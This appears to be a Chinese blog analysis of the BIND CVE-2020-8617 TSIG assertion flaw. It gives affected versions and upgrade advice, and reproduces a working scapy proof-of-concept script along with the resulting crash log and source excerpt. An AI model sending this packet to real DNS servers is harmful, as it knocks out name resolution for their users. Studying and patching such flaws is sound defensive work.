张舵主
张舵主

ISC BIND CVE-2020-8617高危漏洞分析

2020年5月22日,国家信息安全漏洞共享平台(CNVD)https://www.cnvd.org.cn 收录了DNS BIND拒绝服务漏洞(CNVD-2020-29429,对应CVE-2020-8617)。攻击者利用该漏洞,可使BIND域名解析服务崩溃。

ISC BIND CVE-2020-8617高危漏洞分析_第1张图片

目前,该漏洞的利用代码已公开,github有相关漏洞的教学演示,点击链接
ISC官网对此漏洞的详细说明点击链接,ISC对此漏洞的描述如下:
  1. 攻击者可能利用BIND代码中的错误检查包含TSIG资源记录的消息的有效性,从而在tsig.c中触发断言失败,从而导致拒绝为客户端提供服务。
  2. 使用特制的消息,如果攻击者知道(或成功猜测)服务器使用的TSIG密钥的名称,则攻击者可能会导致BIND服务器进入不一致状态。
  3. 由于BIND默认情况下甚至会在其配置未使用的本地服务器上配置本地会话密钥,因此几乎所有当前的BIND服务器都容易受到攻击。
ISC给出目前受到此漏洞影响的版本如下,同时给出升级的版本,建议大家尽快升级。
  • BIND 9.12.0 ~ 9.12.4P2
  • BIND 9.14.0 ~ 9.14.11
  • BIND 9.16.0 ~ 9.16.2
  • BIND 9.17.0 ~ 9.17.1 实验版本分支
  • BIND 9.13 ~ 9.15 所有废弃的开发分支
  • BIND 9.9.3-S1 至 9.11.18-S1 的发行预览版
从公开的漏洞演示代码简单分析此漏洞的细节。
  1. 先看如下python3的脚本,使用了scapy库实现域名的standerd query但附加了TSIG信息。
#!/usr/bin/python
#coding:utf-8

from scapy.all import DNS, DNSQR, IP, sr1, UDP, DNSRRTSIG, DNSRROPT

tsig = DNSRRTSIG(rrname="local-ddns", algo_name="hmac-sha256", rclass=255, mac_len=0, mac_data="", time_signed=0, fudge=300, error=16)

dns_req = IP(dst='127.0.0.1')/UDP(dport=53)/DNS(rd=1, ad=1, qd=DNSQR(qname='www.example.com'), ar=tsig)
answer = sr1(dns_req, verbose=0)

print(answer[DNS].summary())

dst是DNS服务器的IP地址,这里有个rrname="local-ddns"的配置,这个我们简单介绍一下:
bind软件的用于TSIG会话密钥密钥名称,如果不指定,则默认就是local-ddns,bind程序named启动后,从存放TSIG会话密钥的文件session.key来看,默认的秘钥值key确实是local-ddns,秘钥算法是hmac-sha256,这就也就是为什么ISC官网说:Since BIND, by default, configures a local session key even on servers whose configuration does not otherwise make use of it, almost all current BIND servers are vulnerable.

[root@localhost named]# cat session.key 
key "local-ddns" {
	algorithm hmac-sha256;
	secret "QnosxYWRr2GVqnKrxMXGZpI0cuUQ/4f+FROsSyTBV7M=";
};
[root@localhost named]# pwd
/root/bind12/var/run/named
  1. 演示的效果也比较简单直接。
    bind运行在-g状态下,执行脚本后named直接报错退出了并指向代码tsig.c:869: INSIST(msg->verified_sig) failed
14-Jun-2020 08:32:00.415 zone example.com/IN: loaded serial 2015012902
14-Jun-2020 08:32:00.415 all zones loaded
14-Jun-2020 08:32:00.415 running
14-Jun-2020 08:32:00.415 zone example.com/IN: sending notifies (serial 2015012902)


14-Jun-2020 08:34:32.215 client @0x7f23c40e2780 192.168.130.180#53: request has invalid signature: TSIG local-ddns: tsig verify failure (BADTIME)
14-Jun-2020 08:34:32.215 tsig.c:869: INSIST(msg->verified_sig) failed
14-Jun-2020 08:34:32.215 exiting (due to assertion failure)
[root@localhost ~]#

演示环境的bind版本是bind-9.12.4,找到tsig.c代码文件的相关行如下。

/*
                 * If this is a response, and if there was a TSIG in
                 * the query, digest the request's MAC.
                 *
                 * (Note: querytsig should be non-NULL for all
                 * responses except TKEY responses. Those may be signed
                 * with the newly-negotiated TSIG key even if the query
                 * wasn't signed.)
                 */
                if (response && msg->querytsig != NULL) {
                        dns_rdata_t querytsigrdata = DNS_RDATA_INIT;

                        INSIST(msg->verified_sig);

                        ret = dns_rdataset_first(msg->querytsig);
                        if (ret != ISC_R_SUCCESS)
                                goto cleanup_context;
                        dns_rdataset_current(msg->querytsig, &querytsigrdata);
                        ret = dns_rdata_tostruct(&querytsigrdata, &querytsig,
                                                 NULL);
                        if (ret != ISC_R_SUCCESS)
                                goto cleanup_context;
                        isc_buffer_putuint16(&databuf, querytsig.siglen);
                        if (isc_buffer_availablelength(&databuf) <
                            querytsig.siglen) {
                                ret = ISC_R_NOSPACE;
                                goto cleanup_context;
                        }
                        isc_buffer_putmem(&databuf, querytsig.signature,
                                          querytsig.siglen);
                        isc_buffer_usedregion(&databuf, &r);
                        ret = dst_context_adddata(ctx, &r);
                        if (ret != ISC_R_SUCCESS)
                                goto cleanup_context;
                }

脚本发出的查询请求抓包中相关内容如下。
ISC BIND CVE-2020-8617高危漏洞分析_第2张图片

以上是对此问题的简单分析,这个漏洞确实还是有较大的风险,再加上前几天刚刚暴露的DNS查询机制存在NXNSAttack攻击模式,说明DNS系统还是比较脆弱的,也说明大家都在关注DNS安全。

你可能感兴趣的:(#,DNS系统运维)

  • python logging模块默认日志级别_一看就懂,Python 日志 logging 模块详解及应用 路易·罗莎 pythonlogging模块默认日志级别
    日志概述百度百科的日志概述:Windows网络操作系统都设计有各种各样的日志文件,如应用程序日志,安全日志、系统日志、Scheduler服务日志、FTP日志、WWW日志、DNS服务器日志等等,这些根据你的系统开启的服务的不同而有所不同。我们在系统上进行一些操作时,这些日志文件通常会记录下我们操作的一些相关内容,这些内容对系统安全工作人员相当有用。比如说有人对系统进行了IPC探测,系统就会在安全日志
  • Linux网络服务配置:从基础到高级 M78NB666 linux运维服务器
    一、网络服务配置基础1.网络接口配置Linux系统中,网络接口的配置通常通过/etc/network/interfaces文件(Debian/Ubuntu)或/etc/sysconfig/network-scripts/ifcfg-文件(RedHat/CentOS)来完成。配置内容包括IP地址、子网掩码、网关等。2.DNS配置DNS配置通常在/etc/resolv.conf文件中设置,包括指定DN
  • 前端性能优化 EdmundChen
    要做性能优化,首先我们得知道用户从开始访问站点到看结果的这一段时间到底后花在了哪些地方。这就设计到一个经典问题。在游览器输入地址按下回车键之后到用户看到结果经历了哪些过程,这里简单说一下大的几个过程。(假设是输入的一个域名而非IP)1.通过DNS解析获得网址的对应IP地址2.浏览器拿到IP地址与远程web服务器通过TCP三次握手协商来建立一个TCP/IP连接3.浏览器通过HTTP接发送请求4.服务
  • 微服务治理:Nacos, Zookeeper, consul, etcd, Eureka等 5 个常用微服务注册工具对比 surfirst 架构微服务zookeeperconsul
    当然!下面是Nacos、Zookeeper、Consul、etcd和Eureka这五个常用的注册中心的详细对比:Nacos:Nacos是由HashiCorp开发的高度可扩展和可靠的服务发现、配置管理和服务网格解决方案。它的架构基于一组服务器代理形成的共识组和与服务器交互的许多客户端代理。主要特点包括:服务发现:服务在Nacos中注册,客户端可以通过DNS或HTTPAPI发现服务及其位置。健康检查:
  • 写出渗透测试信息收集详细流程 卿酌南烛_b805
    一、扫描域名漏洞:域名漏洞扫描工具有AWVS、APPSCAN、Netspark、WebInspect、Nmap、Nessus、天镜、明鉴、WVSS、RSAS等。二、子域名探测:1、dns域传送漏洞2、搜索引擎查找(通过Google、bing、搜索c段)3、通过ssl证书查询网站:https://myssl.com/ssl.html和https://www.chinassl.net/ssltools
  • PCDN边缘计算入门指南 i806293477 网络
    PCDN边缘计算是什么P2P内容分发网络(英文名:P2PCDN,以下简称PCDN)是以P2P技术为基础,通过挖掘利用边缘网络海量碎片化闲置资源而构建的低成本高品质内容分发网络服务。你可以通过集成PCDNSDK(以下简称SDK)接入该服务后能获得等同(或略高于)CDN的分发质量,同时显著降低分发成本。适用于视频点播、直播、大文件下载等业务场景。PCDN出现的原因:降低客户的分发成本,提升视频播放流畅
  • LSP协议被劫持导致不能上网 tgl182 LSP协议
    故障现象:最近有同事电脑浏览器打不开网页,DNS没问题,外网地址可以PING通,本地连接显示正常,登陆QQ显示网络连接超时,打开浏览器不能显示网页,网络丢包率达到了100%,本地连接数据包收到为0,查杀木马、病毒也不能解决问题。原因分析:WinsockLSP全称WindowsSocketLayeredServiceProvider(分层服务提供商),它是Windows底层网络Socker通信需要经
  • 用户登陆网址都发生了什么? 阳爱铭 java学习机器学习人工智能github程序人生改行学it
    用户从网址登录到查询后端服务,中间涉及多个步骤,每个步骤都有特定的功能和设计考量。以下是一个详细的描述,涵盖了从用户请求到后端服务响应的全过程。1.用户请求步骤:用户在浏览器中输入URL并按下回车。功能:DNS解析:浏览器将URL解析为IP地址。建立TCP连接:浏览器与服务器建立TCP连接。发送HTTP请求:浏览器向服务器发送HTTP请求。设计考量:DNS解析:通过DNS将人类可读的域名转换为服务
  • 面试流程(该怎么讲) 鸣名旧 面试职场和发展
    1.首先自我介绍2.Windows部署项目需要那些服务,或者需要配置那些服务Linux系统查看ip命令是什么3、相关协议ssh协议:TCP,22号端口dns协议:TCP,UDP,53号端口telnet协议:TCP,23号端口ftp协议:TCP,2021号端口http协议:TCP,80https协议:TCP,443mysql:TCP,3306order:1521sqlserver:1433docke
  • 计算机网络笔记分享(第六章 应用层) 寒页_ 计算机网络计算机网络笔记
    文章目录六、应用层6.1域名系统DNS解析的两种查询方式6.2文件传送协议FTP简单传输协议TFTP6.3远程终端协议TELNET6.4万维网WWW统一资源定位符URL超文本传输协议HTTP万维网的文档HTML万维网的信息检索系统博客和微博社交网站6.5电子邮件6.6动态主机配置协议DHCP6.7简单网络管理协议SNMP6.8应用进程跨越网络的通信几种常用的系统调用6.9P2P应用介绍学习计算机网
  • 当路由器出现DNS没有被解析的情况时,可以尝试以下修复建议来解决问题 weixin_45544617 智能路由器
    当路由器出现DNS没有被解析的情况时,可以尝试以下修复建议来解决问题:1.检查网络连接确保路由器和调制解调器(如果有的话)正常工作,并且所有连接线缆都正确连接。尝试重新启动路由器和调制解调器,以解决可能的临时网络问题。2.刷新DNS缓存Windows系统:打开命令提示符(CMD),输入ipconfig/flushdns命令,然后回车执行,以清除本地DNS缓存。Mac系统:打开终端,输入sudoki
  • 鸿蒙开发(NEXT/API 12)【MDNS管理】 网络篇 移动开发技术栈 鸿蒙开发harmonyos网络华为openharmony鸿蒙MDNS鸿蒙系统
    简介MDNS即多播DNS(MulticastDNS),提供局域网内的本地服务添加、移除、发现、解析等能力。本地服务:局域网内服务的提供方,比如打印机、扫描器等。MDNS管理的典型场景有:管理本地服务,通过对本地服务的创建,删除和解析等,管理本地服务。发现本地服务,通过DiscoveryService对象,对指定类型的本地服务状态变化进行监听。说明为了保证应用的运行效率,大部分API调用都是异步的,
  • 鸿蒙开发(NEXT/API 12)【网络连接管理】 网络篇 移动开发技术栈 鸿蒙开发harmonyos网络openharmony鸿蒙系统鸿蒙网络连接管理移动开发
    简介网络连接管理提供管理网络一些基础能力,包括WiFi/蜂窝/Ethernet等多网络连接优先级管理、网络质量评估、订阅默认/指定网络连接状态变化、查询网络连接信息、DNS解析等功能。说明为了保证应用的运行效率,大部分API调用都是异步的,对于异步调用的API均提供了callback和Promise两种方式,以下示例均采用promise函数。基本概念网络生产者:数据网络的提供方,比如WiFi、蜂窝
  • linux运维常见命令行 问道飞鱼 运维linux服务器
    文章目录用户管理创建用户修改用户信息列出用户信息添加用户到组删除用户创建和管理组查看用户和组的信息其他相关命令文件管理文件和目录的基本操作文件权限管理文件压缩和归档磁盘管理查看磁盘使用情况查看文件和目录的磁盘使用情况磁盘分区管理挂载和卸载文件系统磁盘配额管理LVM(LogicalVolumeManager)管理网络管理查看网络接口状态配置网络接口查看和管理路由表管理DNS和主机名网络诊断工具网络流
  • DNS主从服务架构(thirteen day) 沉迷于学习的网络狗 服务器网络运维
    回顾编号主机名IP地址说明修改1web服务器192.168.1.11发布部署web服务发布了一个nginxweb服务2DNS服务器192.168.1.22用于解析域名和IP地址1、安装bind2、配置一个conf,zones,zone3、检查了3个文件4、启动3client主机192.168.1.33用于模拟客户机修改dns的访问主机临时修改echo“nameserver192.168.1.22”
  • 网页显示无法解析服务器DNS地址,打开windows7系统下网页提示无法解析服务器的DNS地址怎么办... 含老司开挖掘机
    有使用windows7系统的用户表示,在使用电脑的过程中,打开网页时提示错误:“无法解析服务器的DNS地址”的情况,最后导致网页无法打开,这是怎么回事呢?对于这样的问题我们又该怎么解决呢?以下是详细的操作步骤。方法一:1、点击开始菜单,点击“控制面板”;2、在控制面板中将查看方式修改为“类别”;3、然后点击“更改适配器设置”;4、在我们正在使用的本地连接上单击右键,选择“属性”;5、在“本地连接属
  • 01 Web基础与HTTP协议 子非鱼    前端http网络协议
    1.1Web基础本章将介绍Web基础知识,包括域名的概念、DNS原理、静态网页和动态网页的相关知识。1.1.1.域名概述1.域名的概念ip地址不易记忆2.早期使用host文件解析域名主机名重复主机维护困难3.DNS分布式层次式4.域名空间结构根域顶级域组织域国家域二级域名FQDN=主机名.DNS后缀1.2网页的概念1.2.1网页纯文本格式文件编写语言为HTNL在用户的浏览器中被‘翻译’成网页形成显
  • linux访问外网的设置 错误重复学习记录 linux运维服务器
    Ubuntu|LUCKFOXWIKI开发板配置添加路由信息sudorouteadddefaultgw172.32.0.100添加DNSservers打开文件sudovi/etc/resolv.conf添加以下内容:nameserver8.8.8.8联网测试pingwww.baidu.com开机自动配置路由信息和DNSservers重启后会被清除,我们创建一个脚本开机后自动帮我们完成配置cd/etc
  • mysql 新增管理员_操作MYSQL数据库给WordPress增加新的管理员账号 仙剑李逍遥 mysql新增管理员
    网页制作网络技术需要大家共同分享,不能闭门造车,下面是bj-dns文章简介:如何手工给wordpress增加一个管理员帐号。首先,我先设定数据库已经存在了wordpress的表,下面就是操作了。首先我们来到PHPMyAdmin界面。我们主要要操作wp_users和wp_usermeta表。首先操作wp_users表增加一个用户选中wp_users表并且点击界面上的插入按钮(在上面一排操作的中间偏后
  • LINUX 入门 7 halcyonfreed LINUX入门linux服务器
    LINUX入门7day1020240506耗时:59minday1120240507耗时:106min课程链接地址第7章http客户端请求1http项目介绍与Http协议讲解先去看一遍教程扫一遍,不用完全一行行读ctrl+shift+I调出来网页调试台——network——img过程:client浏览器建立与百度服务器的tcp连接(用DNS翻译成ip)在tcp连接socket上发送http协议请求
  • Linux中检查网络问题的常用命令 程序员喵哥 Linux网络linuxphp服务器运维
    更多Python学习内容:ipengtao.com在Linux系统中,网络问题是常见的挑战之一。无论是服务器管理员还是普通用户,都可能遇到各种网络故障,如连接问题、DNS解析问题、网络延迟等。为了快速诊断和解决这些问题,掌握一些常用的网络故障排查命令是至关重要的。本文将介绍一些在Linux系统中常用的网络故障排查命令,并提供详细的示例代码,方便更好地理解和应用这些命令。ping命令ping命令是最
  • Spring Cloud Alibaba面试题 golove666 面试题大全面试微服务springcloud
    SpringCloudAlibaba1SpringCloudAlibaba基础组件1.1解释SpringCloudAlibaba及其主要目标1.2分析Nacos服务注册与发现的原理服务注册服务发现心跳检测数据一致性Nacos集群和持久化基于DNS和RPC的服务发现1.3描述Sentinel的熔断限流机制限流(RateLimiting)熔断降级(CircuitBreakingandFallback)
  • 探索网络服务的新利器:net-mdns 虞熠蝶
    探索网络服务的新利器:net-mdnsnet-mdnsSimplemulticastDNS项目地址:https://gitcode.com/gh_mirrors/ne/net-mdns在现代网络环境中,服务的发现与管理变得越来越重要。无论是在家庭网络、企业内部还是云端环境中,快速、准确地发现和识别服务是确保系统高效运行的关键。今天,我们将介绍一个强大的开源项目——net-mdns,它基于RFC67
  • 2018-06-25 我是食神
    https://mparticle.uc.cn/article.html?uc_param_str=frdnsnpfvecpntnwprdssskt&wm_aid=56d68139ca424fe99712b8c77a84769f&wm_id=5836ba48dd36477dbba9cc1c92a03703张子强
  • 默认网关192.168.1.1和默认DNS8.8.8.8 abytecoder 笔记
    设置静态IP时,使用192.168.1.1作为默认网关和8.8.8.8作为默认DNS服务器的选择并没有特殊的背景和意义,而是一种常见的默认配置。这些值通常在示例和教程中被广泛使用,因为它们是常见的默认设置,易于记忆和使用。1.默认网关(DefaultGateway):网关是连接本地网络和互联网的设备,它负责转发网络数据包。192.168.1.1是一个常见的默认网关地址,经常用于家庭网络或小型办公网
  • OSI模型以及各类协议 cainiaoke
    OSI(网络层次结构模型)物理层-网卡,网线等物理设备数据链路层-数据封装,交换机网络层-IP地址,路由器传输层-TCP,UDP,定义传输数据的协议端口号会话层-本地与远程主机进行会话表示层-数据的表示,安全,压缩应用层-HTTPFTPTFTPSMTPSNMPDNS各类协议TCP:用于从应用程序到网络的数据传输IP:负责计算机之间的通讯,负责在英特网上发送和接收数据包HTTP:负责WEB服务器与W
  • AWS EC2 实例名称DNS服务器 缪昱锨Hunter
    AWSEC2实例名称DNS服务器项目简介aws-name-server是一个基于DNS的服务器,它允许您通过名字查询AWS上的EC2实例。简单地设置一下,您的EC2实例就可以通过自定义的域名进行访问,如.aws.bugsnag.com或者.role.aws.bugsnag.com。技术剖析该项目利用了AWS的API权限ec2:DescribeInstances,能够获取所有已标记的实例信息,并将这
  • 第十三周作业 L星Y
    一、简述DNS服务器原理,并搭建主-辅服务器1、DNS服务器原理第一步:客户机提出域名解析请求,并将该请求发送给本地的域名服务器;第二步:当本地的域名服务器收到请求后,就先查询本地的缓存,如果有该纪录项,则本地的域名服务器就直接把查询的结果返回;第三步:如果本地的缓存中没有该纪录,则本地域名服务器就直接把请求发给根域名服务器,然后根域名服务器再返回给本地域名服务器一个所查询域(根的子域)的主域名服
  • powerdns配置 weixin_33701251 php数据库运维
    系统:centos7组成软件:epel仓库、mariadb数据库、powerdns步骤1:安装epel仓库yum install epel-release.noarch2:安装mariaDByum -y install mariadb-server mariadb3.设置服务开机启动和启动Mariadbsystemctl enable mariadb.servicesystemcatl start
  • powerdns mysql_PowerDNS安装部署 泰坦V powerdnsmysql
    centos安装epel检验epel[[email protected]]#lsCentOS-Base.repoCentOS-fasttrack.repoCentOS-Vault.repoCentOS-CR.repoCentOS-Media.repoepel.repoCentOS-Debuginfo.repoCentOS-Sources.repoepel-testing.repo安装
  • js动画html标签(持续更新中) 843977358 htmljs动画mediaopacity
    1.jQuery 效果 - animate() 方法    改变 "div" 元素的高度:    $(".btn1").click(function(){      $("#box").animate({height:"300px
  • springMVC学习笔记 caoyong springMVC
    1、搭建开发环境    a>、添加jar文件,在ioc所需jar包的基础上添加spring-web.jar,spring-webmvc.jar    b>、在web.xml中配置前端控制器       <servlet>     &nbs
  • POI中设置Excel单元格格式 107x poistyle列宽合并单元格自动换行
    引用:http://apps.hi.baidu.com/share/detail/17249059 POI中可能会用到一些需要设置EXCEL单元格格式的操作小结: 先获取工作薄对象: HSSFWorkbook wb = new HSSFWorkbook(); HSSFSheet sheet = wb.createSheet(); HSSFCellStyle setBorder = wb.
  • jquery 获取A href 触发js方法的this参数 无效的情况 一炮送你回车库 jquery
    html如下:  <td class=\"bord-r-n bord-l-n c-333\"> <a class=\"table-icon edit\" onclick=\"editTrValues(this);\">修改</a> </td>"   j
  • md5 3213213333332132 MD5
    import java.security.MessageDigest; import java.security.NoSuchAlgorithmException; public class MDFive { public static void main(String[] args) { String md5Str = "cq
  • 完全卸载干净Oracle11g sophia天雪 orale数据库卸载干净清理注册表
    完全卸载干净Oracle11g A、存在OUI卸载工具的情况下:     第一步:停用所有Oracle相关的已启动的服务;     第二步:找到OUI卸载工具:在“开始”菜单中找到“oracle_OraDb11g_home”文件夹中         &
  • apache 的access.log 日志文件太大如何解决 darkranger apache
    CustomLog logs/access.log common  此写法导致日志数据一致自增变大。 直接注释上面的语法 #CustomLog logs/access.log common 增加: CustomLog "|bin/rotatelogs.exe -l logs/access-%Y-%m-d.log 
  • Hadoop单机模式环境搭建关键步骤 aijuans 分布式
            Hadoop环境需要sshd服务一直开启,故,在服务器上需要按照ssh服务,以Ubuntu Linux为例,按照ssh服务如下: sudo apt-get install ssh sudo apt-get install rsync 编辑HADOOP_HOME/conf/hadoop-env.sh文件,将JAVA_HOME设置为Java
  • PL/SQL DEVELOPER 使用的一些技巧 atongyeye javasql
    1 记住密码 这是个有争议的功能,因为记住密码会给带来数据安全的问题。 但假如是开发用的库,密码甚至可以和用户名相同,每次输入密码实在没什么意义,可以考虑让PLSQL Developer记住密码。 位置:Tools菜单--Preferences--Oracle--Logon HIstory--Store with password 2 特殊Copy 在SQL Window
  • PHP:在对象上动态添加一个新的方法 bardo 方法动态添加闭包
    有关在一个对象上动态添加方法,如果你来自Ruby语言或您熟悉这门语言,你已经知道它是什么...... Ruby提供给你一种方式来获得一个instancied对象,并给这个对象添加一个额外的方法。   好!不说Ruby了,让我们来谈谈PHP   PHP未提供一个“标准的方式”做这样的事情,这也是没有核心的一部分...   但无论如何,它并没有说我们不能做这样
  • ThreadLocal与线程安全 bijian1013 javajava多线程threadLocal
    首先来看一下线程安全问题产生的两个前提条件:  1.数据共享,多个线程访问同样的数据。  2.共享数据是可变的,多个线程对访问的共享数据作出了修改。    实例:         定义一个共享数据: public static int a = 0;        
  • Tomcat 架包冲突解决 征客丶 tomcatWeb
    环境: Tomcat 7.0.6 win7 x64 错误表象:【我的冲突的架包是:catalina.jar 与 tomcat-catalina-7.0.61.jar 冲突,不知道其他架包冲突时是不是也报这个错误】 严重: End event threw exception java.lang.NoSuchMethodException: org.apache.catalina.dep
  • 【Scala三】分析Spark源代码总结的Scala语法一 bit1129 scala
    Scala语法 1. classOf运算符 Scala中的classOf[T]是一个class对象,等价于Java的T.class,比如classOf[TextInputFormat]等价于TextInputFormat.class    2. 方法默认值 defaultMinPartitions就是一个默认值,类似C++的方法默认值    
  • java 线程池管理机制 BlueSkator java线程池管理机制
    编辑 Add Tools   jdk线程池   一、引言 第一:降低资源消耗。通过重复利用已创建的线程降低线程创建和销毁造成的消耗。第二:提高响应速度。当任务到达时,任务可以不需要等到线程创建就能立即执行。第三:提高线程的可管理性。线程是稀缺资源,如果无限制的创建,不仅会消耗系统资源,还会降低系统的稳定性,使用线程池可以进行统一的分配,调优和监控。  
  • 关于hql中使用本地sql函数的问题(问-答) BreakingBad HQL存储函数
    转自于:http://www.iteye.com/problems/23775 问: 我在开发过程中,使用hql进行查询(mysql5)使用到了mysql自带的函数find_in_set()这个函数作为匹配字符串的来讲效率非常好,但是我直接把它写在hql语句里面(from ForumMemberInfo fm,ForumArea fa where find_in_set(fm.userId,f
  • 读《研磨设计模式》-代码笔记-迭代器模式-Iterator bylijinnan java设计模式
    声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ import java.util.Arrays; import java.util.List; /** * Iterator模式提供一种方法顺序访问一个聚合对象中各个元素,而又不暴露该对象内部表示 * * 个人觉得,为了不暴露该
  • 常用SQL chenjunt3 oraclesqlC++cC#
    --NC建库 CREATE TABLESPACE NNC_DATA01 DATAFILE 'E:\oracle\product\10.2.0\oradata\orcl\nnc_data01.dbf' SIZE 500M AUTOEXTEND ON NEXT 50M EXTENT MANAGEMENT LOCAL UNIFORM SIZE 256K ; CREATE TABLESPA
  • 数学是科学技术的语言 comsci 工作活动领域模型
      从小学到大学都在学习数学,从小学开始了解数字的概念和背诵九九表到大学学习复变函数和离散数学,看起来好像掌握了这些数学知识,但是在工作中却很少真正用到这些知识,为什么?    最近在研究一种开源软件-CARROT2的源代码的时候,又一次感觉到数学在计算机技术中的不可动摇的基础作用,CARROT2是一种用于自动语言分类(聚类)的工具性软件,用JAVA语言编写,它
  • Linux系统手动安装rzsz 软件包 daizj linuxszrz
    1、下载软件 rzsz-3.34.tar.gz。登录linux,用命令 wget http://freeware.sgi.com/source/rzsz/rzsz-3.48.tar.gz下载。 2、解压 tar zxvf  rzsz-3.34.tar.gz 3、安装  cd rzsz-3.34 ; make posix 。注意:这个软件安装与常规的GNU软件不
  • 读源码之:ArrayBlockingQueue dieslrae java
        ArrayBlockingQueue是concurrent包提供的一个线程安全的队列,由一个数组来保存队列元素.通过 takeIndex和 putIndex来分别记录出队列和入队列的下标,以保证在出队列时 不进行元素移动. //在出队列或者入队列的时候对takeIndex或者putIndex进行累加,如果已经到了数组末尾就又从0开始,保证数
  • C语言学习九枚举的定义和应用 dcj3sjt126com c
    枚举的定义 # include <stdio.h> enum WeekDay { MonDay, TuesDay, WednesDay, ThursDay, FriDay, SaturDay, SunDay }; int main(void) { //int day; //day定义成int类型不合适 enum WeekDay day = Wedne
  • Vagrant 三种网络配置详解 dcj3sjt126com vagrant
    Forwarded port Private network Public network Vagrant 中一共有三种网络配置,下面我们将会详解三种网络配置各自优缺点。 端口映射(Forwarded port),顾名思义是指把宿主计算机的端口映射到虚拟机的某一个端口上,访问宿主计算机端口时,请求实际是被转发到虚拟机上指定端口的。Vagrantfile中设定语法为: c
  • 16.性能优化-完结 frank1234 性能优化
    性能调优是一个宏大的工程,需要从宏观架构(比如拆分,冗余,读写分离,集群,缓存等), 软件设计(比如多线程并行化,选择合适的数据结构), 数据库设计层面(合理的表设计,汇总表,索引,分区,拆分,冗余等) 以及微观(软件的配置,SQL语句的编写,操作系统配置等)根据软件的应用场景做综合的考虑和权衡,并经验实际测试验证才能达到最优。 性能水很深, 笔者经验尚浅 ,赶脚也就了解了点皮毛而已,我觉得
  • Word Search hcx2013 search
    Given a 2D board and a word, find if the word exists in the grid. The word can be constructed from letters of sequentially adjacent cell, where "adjacent" cells are those horizontally or ve
  • Spring4新特性——Web开发的增强 jinnianshilongnian springspring mvcspring4
    Spring4新特性——泛型限定式依赖注入 Spring4新特性——核心容器的其他改进 Spring4新特性——Web开发的增强 Spring4新特性——集成Bean Validation 1.1(JSR-349)到SpringMVC  Spring4新特性——Groovy Bean定义DSL Spring4新特性——更好的Java泛型操作API  Spring4新
  • CentOS安装配置tengine并设置开机启动 liuxingguome centos
    yum install gcc-c++  yum install pcre pcre-devel  yum install zlib zlib-devel  yum install openssl openssl-devel Ubuntu上可以这样安装 sudo aptitude install libdmalloc-dev libcurl4-opens
  • 第14章 工具函数(上) onestopweb 函数
    index.html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/
  • Xelsius 2008 and SAP BW at a glance blueoxygen BOXelsius
    Xelsius提供了丰富多样的数据连接方式,其中为SAP BW专属提供的是BICS。那么Xelsius的各种连接的优缺点比较以及Xelsius是如何直接连接到BEx Query的呢? 以下Wiki文章应该提供了全面的概览。   http://wiki.sdn.sap.com/wiki/display/BOBJ/Xcelsius+2008+and+SAP+NetWeaver+BW+Co
  • oracle表空间相关 tongsh6 oracle
    在oracle数据库中,一个用户对应一个表空间,当表空间不足时,可以采用增加表空间的数据文件容量,也可以增加数据文件,方法有如下几种: 1.给表空间增加数据文件    ALTER TABLESPACE "表空间的名字" ADD DATAFILE    '表空间的数据文件路径' SIZE 50M;   &nb
  • .Net framework4.0安装失败 yangjuanjava .netwindows
    上午的.net framework 4.0,各种失败,查了好多答案,各种不靠谱,最后终于找到答案了 和Windows Update有关系,给目录名重命名一下再次安装,即安装成功了! 下载地址:http://www.microsoft.com/en-us/download/details.aspx?id=17113 方法: 1.运行cmd,输入net stop WuAuServ 2.点击开
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他